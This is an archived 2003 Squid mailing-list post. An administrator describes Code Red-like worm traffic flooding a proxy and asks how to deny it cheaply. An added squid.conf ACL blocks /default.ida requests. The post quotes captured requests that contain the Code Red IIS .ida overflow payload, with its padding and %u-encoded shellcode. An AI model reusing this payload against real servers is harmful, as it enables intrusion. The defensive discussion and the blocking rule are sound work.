Hi,
We are seeing a possible new Code Red. Each victim will flood to a
particular destination. Unlike the original one, this one does not
send a proper HTTP method. Although Squid will return Bad Request, this
attack will consume a lot of resources and bring down the Squid box...
Is anybody catching the same thing? It seems to us that DENIED/403
requires less processing than returning NONE/400 or NONE/411. If this is
true, is there any way to deny these requests?
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Content-length: 3379 
[binary request body omitted]
Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.xx..Content-type: text/xml.Content-length: 3379 ..Cache-Control: max-stale=0
[binary request body omitted]
Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
Thanks,
Wei Keong
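One way to refuse these requests with an ACL instead of letting the request parser answer 400 or 411, as an added squid.conf fragment that is not from the original post. It assumes Squid gets as far as evaluating http_access for these requests (if Squid rejects them during parsing, before ACLs run, the deny never fires and the 400/411 cost is unchanged); the ACL name codered and the localnet lines are arbitrary placeholders.

```conf
# Added example squid.conf fragment (not from the original post).
# Assumption: the worm's request survives parsing far enough for
# http_access to be evaluated; the ACL name "codered" is arbitrary.

# Match the path used by the captured requests: /default.ida
# (anchored at the start of the URL path, case-insensitive).
acl codered urlpath_regex -i ^/default\.ida

# The deny must come before any http_access allow lines, so these
# requests are logged as TCP_DENIED/403 and are not processed further.
http_access deny codered

# Existing rules follow unchanged, for example (placeholder values):
acl localnet src 10.0.0.0/8
http_access allow localnet
http_access deny all
```

After `squid -k reconfigure`, a hit on this rule shows up in access.log with TCP_DENIED/403 in the result field instead of NONE/400 or NONE/411, which is the quickest way to confirm the ACL is actually being reached for these requests.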
Received on Thu Apr 03 2003 - 08:56:14 MST
This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:39 MST